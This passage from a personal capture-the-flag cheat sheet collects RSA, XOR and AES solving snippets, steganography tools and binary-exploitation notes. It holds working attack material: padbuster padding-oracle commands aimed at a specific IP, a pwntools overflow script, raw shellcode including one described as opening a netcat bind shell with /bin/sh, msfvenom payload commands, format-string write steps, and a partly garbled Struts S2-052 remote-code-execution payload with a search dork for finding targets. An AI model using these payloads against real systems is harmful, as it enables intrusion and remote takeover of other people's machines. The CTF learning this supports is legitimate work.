---------------------------------------------------------- 654 | base64 -d flag.b64 | openssl rsautl -decrypt -inkey private.key | cat 655 | 656 | decrypt using private key+base64 of raw encrypt file 657 | ---------------------------------------------- 658 | 659 | def decrypt_RSA(privkey, message): 660 | from Crypto.PublicKey import RSA 661 | from base64 import b64decode 662 | key = open(privkey, "r").read() 663 | rsakey = RSA.importKey(key) 664 | decrypted = rsakey.decrypt(b64decode(message)) 665 | return decrypted 666 | flag = "Ni45iH4UnXSttNuf0Oy80+G5J7tm8sBJuDNN7qfTIdEKJow4siF2cpSbP/qIWDjSi+w=" //base64 encode of raw encrypted file like open('enc.txt','r').read().strip().encode('hex') 667 | print decrypt_RSA('private.key', flag) 668 | 669 | decrypt messeage from public key + raw ciphertext file 670 | ----------------------------------------------------- 671 | RsaCtfTool.py --publickey ./key.pub --uncipher ./flag --verbose --private //not recommended // ./flag is in base64 of raw data 672 | 673 | generate publickey from n and e 674 | ------------------------------- 675 | ./RsaCtfTool.py --createpub --n 4152 --e 53327 676 | for multiple key 677 | --------------- 678 | ./RsaCtfTool.py --publickey "*.key" --verbose --private 679 | for singlekey 680 | --------------------- 681 | ./RsaCtfTool.py --publickey "a.key" --verbose --private 682 | 683 | Decrypt using number ciphertext 684 | ------------------------- 685 | phi = (p- 1) * (q-1) 686 | d = libnum.modular.invmod(e, phi) 687 | print libnum.n2s(pow(c, d, N)) //c must be in number format 688 | 689 | Here p,q,N is number and c is ciphertext where 690 | c1=open('a.txt','r').read().strip().encode('hex') // a.txt file contain raw encrypt data 691 | c=0xc1 (here c1 is above cipher hex encode) 692 | 693 | also youcan get raw cipher text from number 694 | c is in number format. 695 | c1=hex(c) 696 | c=c1.decode('hex') 697 | 698 | *common factor 699 | *weiner attack when N is smaller than e ,also when N is in both public key 700 | *fermar factorization when p and q are close to sqrt(N) 701 | * if same messege encrypted with same e but different N then hastad broadcast 702 | ------------------------------------------------------------------------------- 703 | #abctf2016 704 | import cryptanalib as ca 705 | n1= 706 | c1= 707 | n2= 708 | c2= 709 | n3= 710 | c3= 711 | c=ca.hastad_broadcast_attack([(c1,n1),(c2,n2),(c3,n3)], 3) 712 | print ca.long_to_string(c) 713 | 714 | 715 | openssl s_client -connect :993 //connect to ssl /imap //also u can login via telnet 716 | a login "username" "password" //enter if dovecot is ready 717 | 718 | 719 | goto RsaCtfTool for different attack 720 | usefull features in RsaCtfTool 721 | openssl rsautl -decrypt -in $ENCRYPTED -out $PLAINTEXT -inkey keys/privkey.pem 722 | openssl rsautl -encrypt -in $PLAINTEXT -out $PLAINTEXT.encrypt -pubin -inkey keys/pubkey.pem 723 | 724 | 725 | Chinese Remainder Theorem 726 | ---------------------------- 727 | if a N has multiple prime then this method. 728 | if u given c,n and using yafu you found multiple prime then this method. 729 | https://github.com/diogoaj/ctf-writeups/tree/master/2018/Timisoara/crypto/NotYourAverageRSA 730 | 731 | # From https://crypto.stackexchange.com/questions/31109/rsa-enc-decryption-with-multiple-prime-modulus-using-crt 732 | ts = [] 733 | xs = [] 734 | ds = [] 735 | for i in range(len(primes)): 736 | ds.append(modinv(e, primes[i]-1)) 737 | m = primes[0] 738 | for i in range(1, len(primes)): 739 | ts.append(modinv(m, primes[i])) 740 | m = m * primes[i] 741 | for i in range(len(primes)): 742 | xs.append(pow((c%primes[i]), ds[i], primes[i])) 743 | x = xs[0] 744 | m = primes[0] 745 | for i in range(1, len(primes)): 746 | x = x + m * ((xs[i] - x % primes[i]) * (ts[i-1] % primes[i])) 747 | m = m * primes[i] 748 | print hex(x%n)[2:-1].decode("hex") 749 | 750 | 751 | 752 | from Crypto.PublicKey import RSA 753 | f1 = open("pubkey1.txt", "r") 754 | key = RSA.importKey(f1.read()) 755 | print "n1 =", key.n 756 | print "e1 =", key.e 757 | f2 = open("pubkey1.txt", "r") 758 | key = RSA.importKey(f1.read()) 759 | print "n1 =", key.n 760 | print "e1 =", key.e 761 | f3 = open("flag.enc", "r") 762 | print f3.read().encode('hex') 763 | 764 | 765 | 766 | from Crypto.Cipher import AES 767 | from binascii import a2b_base64 768 | def AES_128_ECB_decrypt(data, key): 769 | cipher = AES.new(key, AES.MODE_ECB) 770 | return cipher.decrypt(data) 771 | filename = '7.txt' 772 | key = 'YELLOW SUBMARINE' 773 | data = a2b_base64(''.join(line.strip() for line in open(filename))) 774 | print AES_128_ECB_decrypt(data, key) 775 | 776 | 777 | def find_zero_md5md5(): 778 | for i in xrange(0,99999999): 779 | t = str(i) 780 | ct = t 781 | ha = hashlib.md5() 782 | ha.update(ct) 783 | md5 = ha.hexdigest() 784 | ha = hashlib.md5() 785 | ha.update(md5+ "SALT") 786 | md52 = ha.hexdigest() 787 | if md52.startswith('0e') and md52[2:].isdigit(): 788 | return ct,md5,md52 789 | if ((i % 1000000) == 0): 790 | print i 791 | return "" 792 | a,b,c = find_zero_md5md5() 793 | print a,b,c 794 | 795 | 796 | 797 | openssl enc -aes-128-ecb -a -in input2 -out output -k "YELLOW SUBMARINE" 798 | openssl enc -d -aes-128-ecb -a -in input2 -out output -k "YELLOW SUBMARINE" 799 | 800 | Use factordb.com to find p and q 801 | 802 | vigenere cypher 803 | ============= 804 | https://www.guballa.de/vigenere-solver 805 | 806 | XOR 807 | ========== 808 | 1.first try to guess the key like flag{ and xor with cyphertext . 809 | if there is more length of key then try to find them. 810 | 2. use exortool or kasiski examination to find key length 811 | xortool -o a.txt 812 | cat xortool_out/* | string | grep flag 813 | 814 | 815 | 816 | if does not know any idea what to do then xor it 817 | XOR three file 818 | ----------------- 819 | def xor_strings(a, b): 820 | return ''.join(chr(ord(i) ^ ord(j)) for i, j in zip(a, b)) 821 | heart_clear = open('Heart_clear.txt').read() 822 | heart_crypt = open('Heart_crypt.txt').read() 823 | key = xor_strings(heart_clear, heart_crypt) 824 | mind_crypt = open('Mind_crypt.txt').read() 825 | mind_clear = xor_strings(mind_crypt, key) 826 | print mind_clear 827 | 828 | 829 | 830 | key = '\x96\xa4*\xc3\x96\x73' 831 | counter = 0 832 | answer = '' 833 | for i in open('cry200.txt', 'rb').read(): 834 | answer += chr(ord(i)^ord(key[counter%6])) 835 | counter += 1 836 | print answer 837 | 838 | def xorr(text,key): 839 | return ''.join(chr(ord(a)^ord(b)) for a,b in zip(text,key)) 840 | text='KGZFK\qZFG]qA\qZFOZ' 841 | for i in range (128): 842 | print xorr(text,chr(i)*len(text)) 843 | 844 | 845 | ascii checking 846 | ---------------------- 847 | if all(ord(char) < 128 for char in text2): 848 | 849 | find length find key encrypt file bruteforce key 850 | --------------- ----------------------------------- ------------------------------- ----------------- ------------------- 851 | 1. xortool a.txt xortool test.txt.xor -l 10 -c 00 xortool test.txt "secret_key" xortool -x encrypted.txt -b 852 | 853 | * 854 | find key 855 | 856 | PADDING ORACLE 857 | ========================= 858 | Decryption 859 | ------------ 860 | padbuster http://88.198.233.174:35082/profile.php yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg= 8 -encoding 0 --cookie "iknowmag1k=yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg=;PHPSESSID=tdd5b0jl58sf70ve667r9n1et6" 861 | 862 | Encryption 863 | --------------- 864 | padbuster http://88.198.233.174:35082/profile.php yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg= 8 -encoding 0 --cookie "iknowmag1k=yDMsIbvCzotYY7G2sLl6vH2zuah2qqpMwt2+5Jo0VdAMHrKJ5/5Xe/67x/yfWJsWqRh3irfsreg=;PHPSESSID=tdd5b0jl58sf70ve667r9n1et6" -plaintext {\"user\":\"admin\",\"role\":\"admin\"} 865 | 866 | 867 | RAW HASH 868 | =============== 869 | 9fcef3897afe2acc3e7438ce14f5b6a3 raw hash make sql injection INCTF 870 | 871 | MEDIA 872 | ==================== 873 | mp3 874 | ----------- 875 | https://academo.org/demos/spectrum-analyzer/ 876 | 877 | mediainfo =>info about audio/video 878 | ffmpeg -i song.webm -map 0:2 out.wav => extract hidden audio file 879 | multimon-ng -t wav -a DTMF out.wav =>decode dual tone 880 | 881 | CRYPTO 882 | ========================================================= 883 | 1.Xor 2.shift 3.RotN 4.Vegenere 5.substitution 884 | 885 | STTEGO 886 | ====================================================================================================== 887 | ===================================================================================================== 888 | 1.binwalk 2.exiftool 3.ghex 4.strings 5.openstego 6.stegsolve 7.steghide(support JPEG,BMP,wav,AU) 889 | 890 | binwalk --dd='.*' music.mp3 891 | steghide extract -sf steghide.jpg -p password (always use this for addition info or if password protected) 892 | 893 | if noclue about image the try reverse google image search 894 | 895 | if found image ,first check binwalk file.png for hidden file then extract using dd 896 | dd if=example.jpg bs=1 skip=1972141 of=foo.zip 897 | foremost -t zip -i exaple.jpg -o folder 898 | 899 | IMAGE PIXEL 900 | =============== 901 | http://www.boyter.org/decoding-captchas/ 902 | https://github.com/VulnHub/ctf-writeups/blob/master/2015/hackim/web-500.md 903 | 904 | from PIL import Image 905 | im = Image.open("dead_parrot.jpg") 906 | pix = im.load() 907 | width,height=im.size 908 | for i in range(width): 909 | for j in range(height): 910 | print pix[i,j] 911 | im.save("alive_parrot.png") # Save the modified pixels as png 912 | 913 | 914 | REVERSE ENG 915 | ============================================================================================================= 916 | ============================================================================================================= 917 | 1.gdb 2.ida 3.r2 4.hopper 918 | 919 | netcat pwn 920 | -------------------- 921 | from pwn import * 922 | r = remote('ezpz.wpictf.xyz', 31337) 923 | msg = r.recvline() 924 | flag_address = int(msg.split(' ')[1], 16) 925 | r.recvline() 926 | buf = 'A'*0x88 927 | buf += p64(flag_address) 928 | r.sendline(buf) 929 | r.interactive() 930 | 931 | 932 | ** 933 | if there is input required to validate a string or get target and after many operation it check final output then u could use angr 934 | https://blog.techorganic.com/2018/04/21/stem-cyber-challenge-2018-keygenme/ 935 | 936 | 937 | BUFFER OVERFLOW 938 | ================ 939 | ***find return address 940 | python -c "print 'A'*32 + 'BBBB'" | strace -i ./pwn4 |& grep si_addr 941 | 942 | ***x/40wx $esp =>print stack and find whre buffer start 943 | *** info frame =>get ebp and eip ADDRESS 944 | ***info register =>get all register 945 | *** 946 | 1.first try to find out max length by segment fault like { python -c "print 'A'*30" |./a.out } 947 | 2. now have to overwrite RT to some other function address. 948 | {objdump -d ./a.out } and find the function name. 949 | Use gdb to find the address of that function 950 | now type { python -c "print 'A'*30+'\x12\x44'" |./a.out } 951 | 952 | 3. objdump -t ./a.out|grep varriable 953 | 4. print win //in gdb used tofind address of func/varriable 954 | 955 | ** 956 | ltrace= find dynamic librabry 957 | strace= findsystem library 958 | ***** 959 | *****another way to find length for buffer overflow 960 | a) first make break point after gets 961 | b) give input in buffer AAAAAAA 962 | c) print x/40wx $esp and get the buffer address //also you can find buffer start using assembly line [ lea -0x5c(%esp) %eax] 963 | d) print info frame // get return address(eip) //the last eip in showing result 964 | e) calculate length to overflow like [start buffer address]-[eip] 965 | 966 | also can find overflow length with [python -c "print 'A'*76+'BBBB'"|strace -i ./stack5] 967 | 968 | find eip overwritten or not / find buffer overflow length 969 | ------------------------------------------------------- 970 | put break point after gets. give input AAAAAA... and hit breakpoint. 971 | find start of buffer using x/120s $esp 972 | type info frame and get first saved eip and check does it overwritten. 973 | 974 | **** 975 | suppose buffer is 64 bytes and it requires 76 bytes to overwrite ebp and another 4 bytes to overwrite eip. 976 | now we can put shellcode within 76 bytes and jump eip to start of the buffer and also put \x90 in starting of buffer. thus we can executes shellcode. 977 | But also try to put shellcode after eip because if shellcode is large and buffer is small 978 | 979 | putting shellcode after RT 980 | --------------------------------- 981 | a) python -c "print 'A'*76+'BBBB'+'C'*120"|./stack5 982 | now print x/10s $esp in gdb , if C found in stack then u can put shellcode after eip. 983 | b) python -c "print 'A'*76+'addresss where \x90 or C start to jump'+'\x90'*120+'shellcode....'"|./stack5 984 | 985 | try netcat shellcode "\xbd\x9b\x77\x1c\xf3\xdd\xc0\xd9\x74\x24\xf4\x5b\x29\xc9\xb1\x14\x31\x6b\x14\x83\xeb\xfc\x03\x6b\x10\x79\x82\x2d\x28\x8a\x8e\x1d\x8d\x27\x3b\xa0\x98\x26\x0b\xc2\x57\x28\x37\x55\x3a\x40\xca\x69\xab\xcc\xa0\x79\x9a\xbc\xbd\x9b\x76\x5a\xe6\x96\x07\x2b\x57\x2d\xbb\x2f\xe8\x4b\x76\xaf\x4b\x24\xee\x62\xcb\xd7\xb6\x16\xf3\x8f\x85\x66\x42\x49\xee\x0e\x7a\x86\x7d\xa6\xec\xf7\xe3\x5f\x83\x8e\x07\xcf\x08\x18\x26\x5f\xa5\xd7\x29" 986 | it will create nc -lnvp 4444 -e /bin/sh command 987 | 988 | *** 989 | push %ebp 990 | mov %esp,%ebp 991 | and $0xfffffff0,%esp 992 | sub $0x60,%esp 993 | movl $0x0,0x5c(%esp) 994 | lea 0x1c(%esp),%eax 995 | mov %eax,(%esp) 996 | call 0x804830c 997 | 998 | buffer address esp+0x1c stored in eax and then pushed into esp ,so we can stored value there. 999 | if we break point after gets and print x $esp we get address of buffer esp+0x1c 1000 | 1001 | 1002 | 1003 | shellcode 1004 | ----------- 1005 | http://www.theprohack.com/2010/09/buffer-overflow-attack-tutorial-by.html 1006 | \x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x89\xe2\x53\x89\xe1\xb0\x0b\xcd\x80 => 25 bytes https://dhavalkapil.com/blogs/Shellcode-Injection/ 1007 | \x31\xc0\x89\xc3\xb0\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80 => 32 bytes https://samsclass.info/127/proj/p3-lbuf1.htm 1008 | 1009 | metasploit shellcode 1010 | ------------- 1011 | msfvenom -p linux/x86/exec -f pl -b '\x0d\x0a\x00\xff' CMD=/bin/sh PrependSetresuid=true 1012 | 1013 | 1014 | 1015 | #!/usr/bin/env python 1016 | offset = 72 1017 | shellcode = "\xb8\x2f\x73\x68\xf0\x25\xff\xff\xff\x0f\x50\xb8\x2f\x62\x69\x6e\x50\x89\xe3\x31\xc0\xb0\x0b\x31\xc9\x31\xd2\xcd\x80" 1018 | nopsled = "\x90" * (offset - len(shellcode)) 1019 | ret = "\x90\xf7\xff\xbf" 1020 | payload = nopsled + shellcode + "JJJJ" + ret 1021 | print payload 1022 | 1023 | 1024 | #include 1025 | #include 1026 | #include 1027 | #include 1028 | 1029 | int main(int argc, char **argv) 1030 | { 1031 | volatile int modified; 1032 | char buffer[64]; 1033 | 1034 | modified = 0; 1035 | gets(buffer); 1036 | 1037 | if(modified != 0) { 1038 | printf("you have changed the 'modified' variable\n"); 1039 | } else { 1040 | printf("Try again?\n"); 1041 | } 1042 | } 1043 | 1044 | 1045 | 1046 | 1047 | push %rbp //push base pointer in stack 1048 | 0x0000000000400505 <+1>: mov %rsp,%rbp //asign rsp as rbp 1049 | 0x0000000000400508 <+4>: sub $0x60,%rsp //rsp move to rsp-96 1050 | 0x000000000040050c <+8>: mov %edi,-0x54(%rbp) 1051 | 0x000000000040050f <+11>: mov %rsi,-0x60(%rbp) 1052 | 0x0000000000400513 <+15>: movl $0x0,-0x4(%rbp) //move zero to rbp-4 for modified=0 1053 | 0x000000000040051a <+22>: lea -0x50(%rbp),%rax //buffer allocate , rbp-0x50 address of buffer where it starting move to rax 1054 | 0x000000000040051e <+26>: mov %rax,%rdi 1055 | 0x0000000000400521 <+29>: callq 0x400410 //call gets to this buffer 1056 | 0x0000000000400526 <+34>: mov -0x4(%rbp),%eax //value of rbp-4 is 0 move to eax 1057 | 0x0000000000400529 <+37>: test %eax,%eax 1058 | 0x000000000040052b <+39>: je 0x400539 1059 | 0x000000000040052d <+41>: mov $0x400648,%edi 1060 | 0x0000000000400532 <+46>: callq 0x4003f0 1061 | 0x0000000000400537 <+51>: jmp 0x400543 1062 | 0x0000000000400539 <+53>: mov $0x400671,%edi 1063 | 0x000000000040053e <+58>: callq 0x4003f0 1064 | 0x0000000000400543 <+63>: leaveq 1065 | 0x0000000000400544 <+64>: retq 1066 | 1067 | 1068 | so here modified varriable located at rbp-4 and its value is 0.buffer start at rbp-0x50 1069 | so we have to make it 1 1070 | 1071 | so total byte need to overwrite modified verriable at rbp-4 address is $rbp-0x50-$rbp-0x4 1072 | 1073 | finding length of buffer overflow 1074 | ----------------------------------- 1075 | * give input like AAAAA and if it gives segfault at specific number then it is total length from that buffer to RT.because after buffer fullit overwrite ebp then RT address. 1076 | 1077 | *run gdb , set break point ,give input AAAAAA.... and it hit breakpoint . 1078 | run x/120x $esp and it gives values stored in stack 1079 | find here address of values 0x41(A) and this is start address of buffer 1080 | run x $ebp and it gives address of $ebp 1081 | now again run x/120X $esp and find offset between previous buffer address and $ebp 1082 | ex: 1083 | (gdb) x/120x $esp 1084 | 0xffffcec0: 0xfe 0xce 0xff 0xff 0x01 0x00 0x00 0x00 1085 | 0xffffcec8: 0xc2 0x00 0x00 0x00 0xd1 0xd1 0xff 0xff 1086 | 0xffffced0: 0xfe 0xce 0xff 0xff 0x00 0xd0 0xff 0xff 1087 | >0xffffced8: 0x00 0x00 0x00 0x00 0x41 0x41 0x41 0x41 1088 | 0xffffcee0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1089 | 0xffffcee8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1090 | 0xffffcef0: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1091 | 0xffffcef8: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1092 | 0xffffcf00: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1093 | 0xffffcf08: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1094 | 0xffffcf10: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1095 | 0xffffcf18: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1096 | 0xffffcf20: 0x41 0x41 0x41 0x41 0x41 0x41 0x41 0x41 1097 | 0xffffcf28: 0x00 0xcf 0xff 0xff 0x1d 0x85 0x04 0x08 1098 | 0xffffcf30: 0xd1 0xd1 0xff 0xff 0xf4 0xcf 0xff 0xff 1099 | here buffer start at 0xffffcedc whhere value 0x41(because we gave AAAA.. as input) 1100 | and $ebp at 0xffffcf28 ,so we can find offset between them + 4 RT 1101 | 1102 | 1103 | FORMAT STRNGS 1104 | ----------------- 1105 | %n is used to write in memory 1106 | 1.first find out where our data is located in stack using => ./vuln "`python -c "print 'AAAA '+'BBBB'+'%x '*100"`" 1107 | 2.it print AAAA 0xbffff.. 0xbff... AAAA BBBB =>here do it still you your first string BBBB in last like here 1108 | 3.Here you have to replace BBBB with address to write in memory. 1109 | 1110 | suppose address of varriable whose value to be overwrite is 0x639874 1111 | a) ./vuln "`python -c "print 'AAAA '+'BBBB'+'%x '*100"`" 1112 | it prints AAAA....0x...BBBB 1113 | b) ./vuln "`python -c "print 'AAAA '+'\x74\x98\x63'+'%x '*99+'%n'"`" 1114 | it will overwrite the value to given address 1115 | https://www.youtube.com/watch?v=0WvrSfcdq1I 1116 | 1117 | a)./vuln "`python -c "print 'AAAA'+'%x '*100"`"%x 1118 | it prints AAAA....0x...AAAA 1119 | b) ./vuln "`python -c "print 'address'+'%x '*100"`"%n 1120 | 1121 | 1122 | 1123 | ROP 1124 | ------------ 1125 | 1126 | RETURN TO LIB 1127 | --------------- 1128 | 1129 | STRUTS s2-052 rest plugin rce 1130 | ====================== 1131 | dork: filetype:action,do 1132 | *first set content type application/xml in get request and send this data 1133 | 1134 | 1135 | 0 false 0 calc false java.lang.ProcessBuilder start

foo foo false 0 0 false false 0 1136 | 1137 | 1138 | 1139 | 1140 | 1141 | LINK 1142 | ========================= 1143 | xmlrpc 1144 | ----------------- 1145 | https://medium.com/@the.bilal.rizwan/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 1146 | 1147 | 1148 | 1149 | 1150 | 1151 | 1152 | --------------------------------------------------------------------------------